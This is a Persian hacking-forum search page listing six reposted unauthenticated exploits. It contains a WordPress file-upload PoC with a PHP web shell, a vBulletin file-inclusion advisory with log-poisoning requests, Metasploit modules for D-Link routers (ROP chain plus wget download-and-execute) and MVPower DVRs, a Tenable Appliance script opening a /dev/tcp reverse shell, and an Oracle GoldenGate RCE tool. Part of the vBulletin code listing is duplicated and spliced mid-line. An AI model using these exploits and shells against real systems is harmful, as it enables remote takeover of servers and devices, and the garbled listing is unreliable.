امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند



iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'unauthenticated'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

7 نتیجه پیدا شد

  1. # Exploit Title: Unauthenticated Arbitrary File Upload # Date: November 12, 2017 # Exploit Author: Colette Chamberland # Author contact: [email protected] # Author homepage: https://defiant.com # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446 # Version: < 3.2.0 # Tested on: Wordpress 4.x # CVE : CVE-2017-16949 Description: Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. PoC: POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1 Host:server User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792 Content-Length: 264 Referer: http://target.com/ Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; Connection: close Upgrade-Insecure-Requests: 1 -----------------------------7230359611602921801124357792 Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_GET['e'].' 2>&1'); ?> -----------------------------7230359611602921801124357792--
  2. # SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution Source: https://blogs.securiteam.com/index.php/archives/3569 ## Vulnerability Summary The following advisory describes a unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin version 5. vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage ## Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program ## Vendor response We tried to contact vBulletin since November 21 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities. ## Vulnerability details vBulletin contains a vulnerability that can allow a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code. An unauthenticated user is able to send a GET request to /index.php which can then trigger the file inclusion vulnerability with parameter routestring=. The request allows an attacker to create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server. **Listing of /index.php:** ``` /* 48 */ $app = vB5_Frontend_Application::init('config.php'); /* 49 */ //todo, move this back so we can catch notices in the startup code. For now, we can set the value in the php.ini /* 50 */ //file to catch these situations. /* 51 */ // We report all errors here because we have to make Application Notice free /* 52 */ error_reporting(E_ALL | E_STRICT); /* 53 */ /* 54 */ $config = vB5_Config::instance(); /* 55 */ if (!$config->report_all_php_errors) { /* 56 */ // Note that E_STRICT became part of E_ALL in PHP 5.4 /* 57 */ error_reporting(E_ALL & ~(E_NOTICE | E_STRICT)); /* 58 */ } /* 59 */ /* 60 */ $routing = $app->getRouter(); /* 61 */ $method = $routing->getAction(); /* 62 */ $template = $routing->getTemplate(); /* 63 */ $class = $routing->getControllerClass(); /* 64 */ /* 65 */ if (!class_exists($class)) /* 66 */ { /* 67 */ // @todo - this needs a proper error message /* 68 */ die("Couldn't find controller file for $class"); /* 69 */ } /* 70 */ /* 71 */ vB5_Frontend_ExplainQueries::initialize(); /* 72 */ $c = new $class($template); /* 73 */ /* 74 */ call_user_func_array(array(&$c, $method), $routing->getArguments()); /* 75 */ /* 76 */ vB5_Frontend_ExplainQueries::finish(); ``` **Let’s take a closer look on vB5_Frontend_Application::init() – Listing of /includes/vb5/frontend/application.php:** ``` /* 15 */ public static function init($configFile) /* 16 */ { /* 17 */ parent::init($configFile); /* 18 */ /* 19 */ self::$instance = new vB5_Frontend_Application(); /* 20 */ self::$instance->router = new vB5_Frontend_Routing(); /* 21 */ self::$instance->router->setRoutes(); /* ... */ ``` We can see that setRoutes() is called: **Listing of /includes/vb5/frontend/routing.php:** ``` /* 47 */ public function setRoutes() /* 48 */ { /* 49 */ $this->processQueryString(); /* 50 */ /* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it /* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : ''; /* 53 */ /* 54 */ if (isset($_GET['routestring'])) /* 55 */ { /* 56 */ $path = $_GET['routestring']; /* ... */ /* 73 */ } /* 74 */ /* 75 */ if (strlen($path) AND $path{0} == '/') /* 76 */ { /* 77 */ $path = substr($path, 1); /* 78 */ } /* 79 */ /* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them /* 81 */ if (strlen($path) > 2 ) /* 82 */ { /* 83 */ $ext = strtolower(substr($path, -4)) ; /* 84 */ if (($ext == /* 47 */ public function setRoutes() /* 48 */ { /* 49 */ $this->processQueryString(); /* 50 */ /* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it /* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : ''; /* 53 */ /* 54 */ if (isset($_GET['routestring'])) /* 55 */ { /* 56 */ $path = $_GET['routestring']; /* ... */ /* 73 */ } /* 74 */ /* 75 */ if (strlen($path) AND $path{0} == '/') /* 76 */ { /* 77 */ $path = substr($path, 1); /* 78 */ } /* 79 */ /* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them /* 81 */ if (strlen($path) > 2 ) /* 82 */ { /* 83 */ $ext = strtolower(substr($path, -4)) ; /* 84 */ if (($ext == '.gif') OR ($ext == '.png') OR ($ext == '.jpg') OR ($ext == '.css') /* 85 */ OR (strtolower(substr($path, -3)) == '.js') ) /* 86 */ { /* 87 */ header("HTTP/1.0 404 Not Found"); /* 88 */ die(''); /* 89 */ } /* 90 */ } /* 91 */ /* 92 */ try /* 93 */ { /* 94 */ $message = ''; // Start with no error. /* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING'])); /* 96 */ } /* 97 */ catch (Exception $e) /* 98 */ { /* ... */ /* 106 */ } /* ... */ /* 127 */ if (!empty($route)) /* 128 */ { /* ... */ /* 188 */ } /* 189 */ else /* 190 */ { /* 191 */ // if no route was matched, try to parse route as /controller/method /* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/')); /* ... */ /* 229 */ } /* 230 */ /* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle /* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll /* 233 */ //handle deeper paths via more standard routes. /* 234 */ if (strpos($path, '/') === false) /* 235 */ { /* 236 */ $this->controller = 'relay'; /* 237 */ $this->action = 'legacy'; /* 238 */ $this->template = ''; /* 239 */ $this->arguments = array($path); /* 240 */ $this->queryParameters = array(); /* 241 */ return; /* 242 */ } /* 243 */ /* 244 */ vB5_ApplicationAbstract::checkState(); /* 245 */ /* 246 */ throw new vB5_Exception_404("invalid_page_url"); /* 247 */ } ) ) /* 86 */ { /* 87 */ header("HTTP/1.0 404 Not Found"); /* 88 */ die(''); /* 89 */ } /* 90 */ } /* 92 */ try /* 93 */ { /* 94 */ $message = ''; // Start with no error. /* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING'])); /* 96 */ } /* 97 */ catch (Exception $e) /* 98 */ { /* ... */ /* 106 */ } /* ... */ /* 127 */ if (!empty($route)) /* 128 */ { /* ... */ /* 188 */ } /* 189 */ else /* 190 */ { /* 191 */ // if no route was matched, try to parse route as /controller/method /* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/')); /* ... */ /* 229 */ } /* 230 */ /* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle /* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll /* 233 */ //handle deeper paths via more standard routes. /* 234 */ if (strpos($path, '/') === false) /* 235 */ { /* 236 */ $this->controller = 'relay'; /* 237 */ $this->action = 'legacy'; /* 238 */ $this->template = ''; /* 239 */ $this->arguments = array($path); /* 240 */ $this->queryParameters = array(); /* 241 */ return; /* 242 */ } /* … */ ``` So if our routestring does not end with ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ and does not contain ‘/’ char vBulletin will call legacy() method from vB5_Frontend_Controller_Relay – /includes/vb5/frontend/controller/relay.php: ``` /* 63 */ public function legacy($file) /* 64 */ { /* 65 */ $api = Api_InterfaceAbstract::instance(); /* 66 */ $api->relay($file); /* 67 */ } ``` If we will check relay() from Api_Interface_Collapsed class – /include/api/interface/collapsed.php: ``` /* 117 */ public function relay($file) /* 118 */ { /* 119 */ $filePath = vB5_Config::instance()->core_path . '/' . $file; /* 120 */ /* 121 */ if ($file AND file_exists($filePath)) /* 122 */ { /* 123 */ //hack because the admincp/modcp files won't return so the remaining processing in /* 124 */ //index.php won't take place. If we better integrate the admincp into the /* 125 */ //frontend, we can (and should) remove this. /* 126 */ vB_Shutdown::instance()->add(array('vB5_Frontend_ExplainQueries', 'finish')); /* 127 */ require_once($filePath); /* 128 */ } /* ... */ ``` As we could see an attacker is not able to use ‘/’ in the $file so he cannot change current directory on Linux. But for Windows he can use ‘\’ as path delimiter and is able to specify any desired file (he can use ‘\..\’ trick as well) and it will be included by php. ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-125x300.jpg) If we want to include file with extension like ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ we will need to bypass the mentioned check in setRoutes() method. This can be easily done by adding dot (‘.’) or space (‘%20’) to the filename. ## Proof of Concept We can check if the server is vulnerable by sending the following GET request: ``` /index.php?routestring=.\\ ``` If the response is: ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-1-300x60.png) The server is vulnerable. If we want to inject a php code to any file on the server we can use the access.log for example: ``` /?LogINJ_START=<?php phpinfo();?>LogINJ_END ``` After that we can include access.log with our PHP code: ``` /index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log ``` ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-2-300x89.jpg)
  3. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' # Payload working status: # MIPS: # - all valid payloads working (the ones that we are able to send without null bytes) # ARM: # - inline rev/bind shell works (bind... meh sometimes) # - stager rev/bind shell FAIL # - mettle rev/bind fails with sigsegv standalone, but works under strace or gdb... class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow', 'Description' => %q{ Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol, which accepts arbitrarily long strings into certain XML parameters and then copies them into the stack. This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and this vulnerability is present in both MIPS and ARM devices. The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a few load and store instructions. Because of this the payloads have to be sent unencoded, which can cause them to fail, although the bind shell seems to work well. For the ARM devices, the inline reverse tcp seems to work best. Check the reference links to see the vulnerable firmware versions. }, 'Author' => [ 'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'References' => [ ['CVE', '2016-6563'], ['US-CERT-VU', '677427'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt'], ['URL', 'http://seclists.org/fulldisclosure/2016/Nov/38'] ], 'DefaultOptions' => { 'WfsDelay' => 10 }, 'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground (ARM target) 'Targets' => [ [ 'Dlink DIR-818 / 822 / 823 / 850 [MIPS]', { 'Offset' => 3072, 'LibcBase' => 0x2aabe000, # should be the same offset for all firmware versions and all routers 'Sleep' => 0x56DF0, # sleep() offset into libuClibc-0.9.30.3.so 'FirstGadget' => 0x4EA1C, # see comments below for gadget information 'SecondGadget' => 0x2468C, 'ThirdGadget' => 0x41f3c, 'PrepShellcode1' => "\x23\xbd\xf3\xc8", # addi sp,sp,-3128 'PrepShellcode2' => "\x03\xa0\xf8\x09", # jalr sp 'BranchDelay' => "\x20\x84\xf8\x30", # addi a0,a0,-2000 (nop) 'Arch' => ARCH_MIPSBE, 'Payload' => { 'BadChars' => "\x00", 'EncoderType' => Msf::Encoder::Type::Raw # else it will fail with SIGILL, this CPU is crippled }, } ], [ 'Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]', { 'Offset' => 1024, 'LibcBase' => 0x400DA000, # we can pick any xyz in 0x40xyz000 (an x of 0/1 works well) 'System' => 0x5A270, # system() offset into libuClibc-0.9.32.1.so 'FirstGadget' => 0x18298, # see comments below for gadget information 'SecondGadget' => 0x40CB8, 'Arch' => ARCH_ARMLE, } ], ], 'DisclosureDate' => 'Nov 7 2016', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('SLEEP', [true, 'Seconds to sleep between requests (ARM only)', '0.5']), OptString.new('SRVHOST', [true, 'IP address for the HTTP server (ARM only)', '0.0.0.0']), OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']), OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']), OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']), ], self.class) end def check begin res = send_request_cgi({ 'uri' => '/HNAP1/', 'method' => 'POST', 'Content-Type' => 'text/xml', 'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' } }) if res && res.code == 500 return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end def calc_encode_addr (offset, big_endian = true) if big_endian [(target['LibcBase'] + offset).to_s(16)].pack('H*') else [(target['LibcBase'] + offset).to_s(16)].pack('H*').reverse end end def prepare_shellcode_arm (cmd) #All these gadgets are from /lib/libuClibc-0.9.32.1.so, which is the library used for all versions of firmware for all ARM routers #first_gadget (pops system() address into r3, and second_gadget into PC): #.text:00018298 LDMFD SP!, {R3,PC} #second_gadget (puts the stack pointer into r0 and calls system() at r3): #.text:00040CB8 MOV R0, SP #.text:00040CBC BLX R3 #system() (Executes argument in r0 (our stack pointer) #.text:0005A270 system #The final payload will be: #'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command shellcode = rand_text_alpha(target['Offset']) + # filler "\xff\xff\xff\xff" + # n integer overwrite (see advisory) rand_text_alpha(16) + # moar filler rand_text_alpha(4) + # r11 calc_encode_addr(target['FirstGadget'], false) + # first_gadget calc_encode_addr(target['System'], false) + # system() address calc_encode_addr(target['SecondGadget'], false) + # second_gadget cmd # our command end def prepare_shellcode_mips #All these gadgets are from /lib/libuClibc-0.9.30.3.so, which is the library used for all versions of firmware for all MIPS routers #<sleep> is at 56DF0 #first gadget - execute sleep and call second_gadget #.text:0004EA1C move $t9, $s0 <- sleep() #.text:0004EA20 lw $ra, 0x20+var_4($sp) <- second_gadget #.text:0004EA24 li $a0, 2 <- arg for sleep() #.text:0004EA28 lw $s0, 0x20+var_8($sp) #.text:0004EA2C li $a1, 1 #.text:0004EA30 move $a2, $zero #.text:0004EA34 jr $t9 #.text:0004EA38 addiu $sp, 0x20 #second gadget - put stack pointer in a1: #.text:0002468C addiu $s1, $sp, 0x58 #.text:00024690 li $s0, 0x44 #.text:00024694 move $a2, $s0 #.text:00024698 move $a1, $s1 #.text:0002469C move $t9, $s4 #.text:000246A0 jalr $t9 #.text:000246A4 move $a0, $s2 #third gadget - call $a1 (stack pointer): #.text:00041F3C move $t9, $a1 #.text:00041F40 move $a1, $a2 #.text:00041F44 addiu $a0, 8 #.text:00041F48 jr $t9 #.text:00041F4C nop #When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (2000+ bytes), we can jump back to the beggining of the buffer. #prep_shellcode_1: 23bdf7a8 addi sp,sp,-3128 #prep_shellcode_2: 03a0f809 jalr sp #branch_delay: 2084f830 addi a0,a0,-2000 #The final payload will be: #shellcode + 'a' * (2064 - shellcode.size) + sleep() + '%31' * 4 + '%32' * 4 + '%33' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay shellcode = payload.encoded + # exploit rand_text_alpha(target['Offset'] - payload.encoded.length) + # filler calc_encode_addr(target['Sleep']) + # s0 rand_text_alpha(4) + # s1 rand_text_alpha(4) + # s2 rand_text_alpha(4) + # s3 calc_encode_addr(target['ThirdGadget']) + # s4 (third gadget) calc_encode_addr(target['FirstGadget']) + # initial pc / ra (first_gadget) rand_text_alpha(0x1c) + # filler calc_encode_addr(target['SecondGadget']) + # second_gadget rand_text_alpha(0x58) + # filler target['PrepShellcode1'] + # exploit prep target['PrepShellcode2'] + # exploit prep target['BranchDelay'] # exploit prep end def send_payload (payload) begin # the payload can go in the Action, Username, LoginPassword or Captcha XML tag body = %{ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <Login xmlns="http://purenetworks.com/HNAP1/"> <Action>something</Action> <Username>Admin</Username> <LoginPassword></LoginPassword> <Captcha>#{payload}</Captcha> </Login> </soap:Body> </soap:Envelope> } res = send_request_cgi({ 'uri' => '/HNAP1/', 'method' => 'POST', 'ctype' => 'text/xml', 'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' }, 'data' => body }) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router") end end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{peer} - A request came in, but the payload wasn't ready yet!") return end print_status("#{peer} - Sending the payload to the device...") @elf_sent = true send_response(cli, @pl) end def exploit print_status("#{peer} - Attempting to exploit #{target.name}") if target == targets[0] send_payload(prepare_shellcode_mips) else downfile = rand_text_alpha(8+rand(8)) @pl = generate_payload_exe @elf_sent = false resource_uri = '/' + downfile #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{peer} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore print_status("#{peer} - Asking the device to download and execute #{service_url}") filename = rand_text_alpha_lower(rand(8) + 2) cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &" shellcode = prepare_shellcode_arm(cmd) print_status("#{peer} - \"Bypassing\" the device's ASLR. This might take up to 15 minutes.") counter = 0.00 while (not @elf_sent) if counter % 50.00 == 0 && counter != 0.00 print_status("#{peer} - Tried #{counter.to_i} times in #{(counter * datastore['SLEEP'].to_f).to_i} seconds.") end send_payload(shellcode) sleep datastore['SLEEP'].to_f # we need to be in the LAN, so a low value (< 1s) is fine counter += 1 end print_status("#{peer} - The device downloaded the payload after #{counter.to_i} tries / #{(counter * datastore['SLEEP'].to_f).to_i} seconds.") end end end
  4. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] } def initialize(info = {}) super(update_info(info, 'Name' => 'MVPower DVR Shell Unauthenticated Command Execution', 'Description' => %q{ This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string. This module was tested successfully on a MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17). The TV-7108HE model is also reportedly affected, but untested. }, 'Author' => [ 'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC 'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'References' => [ # Comment from Paul Davies contains probably the first published PoC [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ], # Writeup with PoC by Andrew Tierney from Pen Test Partners [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ] ], 'DisclosureDate' => 'Aug 23 2015', 'Privileged' => true, # BusyBox 'Arch' => ARCH_ARMLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/mettle_reverse_tcp', 'CMDSTAGER::FLAVOR' => 'wget' }, 'Targets' => [ ['Automatic', {}] ], 'CmdStagerFlavor' => %w{ echo printf wget }, 'DefaultTarget' => 0)) end def check begin fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6) res = send_request_cgi( 'uri' => "/shell?echo+#{fingerprint}", 'headers' => { 'Connection' => 'Keep-Alive' } ) if res && res.body.include?(fingerprint) return CheckCode::Vulnerable end rescue ::Rex::ConnectionError return CheckCode::Unknown end CheckCode::Safe end def execute_command(cmd, opts) begin send_request_cgi( 'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}", 'headers' => { 'Connection' => 'Keep-Alive' } ) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def exploit print_status("#{peer} - Connecting to target") unless check == CheckCode::Vulnerable fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable") end print_good("#{peer} - Target is vulnerable!") execute_cmdstager(linemax: 1500) end end
  5. #!/bin/bash : ' According to http://static.tenable.com/prod_docs/upgrade_appliance.html they fixed two security vulnerabilities in the web interface in release 4.5 so I guess previous version are also vulnerable. # Exploit Title: Unauthenticated remote root code execution on Tenable Appliance # Date: 18/04/17 # Exploit Author: agix # Vendor Homepage: https://www.tenable.com/ # Version: < 4.5 # Tested on: Tenable Appliance 3.5 tenable $ ./rce.sh bash: no job control in this shell bash-3.2# ls app appliancelicense.html appliancelicense.pdf appliancelicense.txt images includes index.ara js lcelicense.html lcelicense.pdf lcelicense.txt migrate nessuslicense.html nessuslicense.pdf nessuslicense.txt password.ara pvslicense.html pvslicense.pdf pvslicense.txt sclicense.html sclicense.pdf sclicense.txt simpleupload.py static bash-3.2# id uid=0(root) gid=0(root) bash-3.2# ' #!/bin/bash TENABLE_IP="172.16.171.179" YOUR_IP="172.16.171.1" LISTEN_PORT=31337 curl -k "https://$TENABLE_IP:8000/simpleupload.py" --data $'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a"\'%0abash -i >%26 /dev/tcp/'$YOUR_IP'/'$LISTEN_PORT' 0>%261%0aecho '& nc -l -p $LISTEN_PORT
  6. #!/usr/bin/env python # Sources: # https://silentsignal.hu/docs/S2_Oracle_GoldenGate_GOLDENSHOWER.py # https://blog.silentsignal.eu/2017/05/08/fools-of-golden-gate/ # # GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal # # Tested with: # Version 12.1.2.0.0 17185003 OGGCORE_12.1.2.0.0_PLATFORMS_130924.1316 Linux, x64, 64bit (optimized) Oracle 11g # Version 12.1.2.0.0 17185003 OGGCORE_12.1.2.0.0T1_PLATFORMS_140313.1216 Windows x64 (optimized) Oracle 12c # # Nmap service fingerprint example: # ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)======== # SF-Port7809-TCP:V=7.12%I=7%D=2/20%Time=DEADBEEF%P=x86_64-unknown-linux-gnu # SF:%r(RPCCheck,2D,"\0\+\x20\x20ERROR\tMGR\x20did\x20not\x20recognize\x20th # SF:e\x20command\.\0")%r(DNSVersionBindReq,28,"\0&\x20\x20ERROR\tMGR\x20Did # SF:\x20Not\x20Recognize\x20Command\0")%r(DNSStatusRequest,28,"\0&\x20\x20E # SF:RROR\tMGR\x20Did\x20Not\x20Recognize\x20Command\0")%r(afp,28,"\0&\x20\x # SF:20ERROR\tMGR\x20Did\x20Not\x20Recognize\x20Command\0")%r(kumo-server,2D # SF:,"\0\+\x20\x20ERROR\tMGR\x20did\x20not\x20recognize\x20the\x20command\. # SF:\0"); import socket import struct import argparse HOST = None PORT = None PLATFORM = None def send_write(cmd): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) term_ch = "#" if PLATFORM == "win": term_ch = "&" cmd_ggsci = "GGSCI START OBEY x\nSHELL,%s %s " % (cmd, term_ch) cmd_ggsci = cmd_ggsci.replace(" ", "\x09") length = struct.pack(">H", len(cmd_ggsci)) s.send(length + cmd_ggsci) r = s.recv(1024) print "[+] '%s' WRITTEN \nReceived: %s\n" % (cmd, repr(r)) s.close() def send_exec(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) cmd = "GGSCI START OBEY ggserr.log".replace(" ", "\x09") length = struct.pack(">H", len(cmd)) s.send(length + cmd) r = s.recv(1024) print "[+] EXECUTED - Received: %s\n" % (repr(r)) s.close() def monitor(): if PLATFORM == "win": print "[!] Windows platform detected, this may not work!" import requests paths = ["messages", "registry", "statuschanges", "mpoints"] for p in paths: r = requests.get("http://%s:%d/%s" % (HOST, PORT, p)) print "\n--- MONITOR - %s ---" % (p) print r.text def version(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) #cmd = "GGSCI VERSION".replace(" ","\x09") cmd = "GGSCI\tVERSION" length = struct.pack(">H", len(cmd)) s.send(length + cmd) r = s.recv(1024) ver = r[5:].replace("\t", " ") print "[+] VERSION: %s\n" % (ver) s.close() return ver def debug(cmd, l=None): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) length = None if l is None: length = struct.pack(">H", len(cmd)) else: length = struct.pack(">H", l) s.send(length + cmd) print "[+] Sent: %s" % (repr(length + cmd)) r = s.recv(1024) print "[+] Received: %s\n" % (repr(r)) s.close() parser = argparse.ArgumentParser( description='GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal') parser.add_argument("--host", help="Target host") parser.add_argument("--port", help="Target port", type=int, default=7809) parser.add_argument("--cmd", help="Command(s) to execute", nargs='*') parser.add_argument( "--monitor", help="Dump information (incl. version) via HTTP monitoring functions", action="store_true") parser.add_argument("--debugcmd", help="Send raw content", required=False) parser.add_argument("--debuglen", help="Indicated size of raw content", type=int, default=None, required=False) args = parser.parse_args() HOST = args.host PORT = args.port ver = version() if "Windows" in ver: PLATFORM = "win" print "[+] Platform: Windows" else: PLATFORM = "nix" print "[+] Platform: *nix" if args.cmd: for c in args.cmd: send_write(c) send_exec() if args.monitor: monitor() if args.debugcmd: debug(args.debugcmd, args.debuglen) # Signature: aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj0wNHZINFdfOVJmZw==
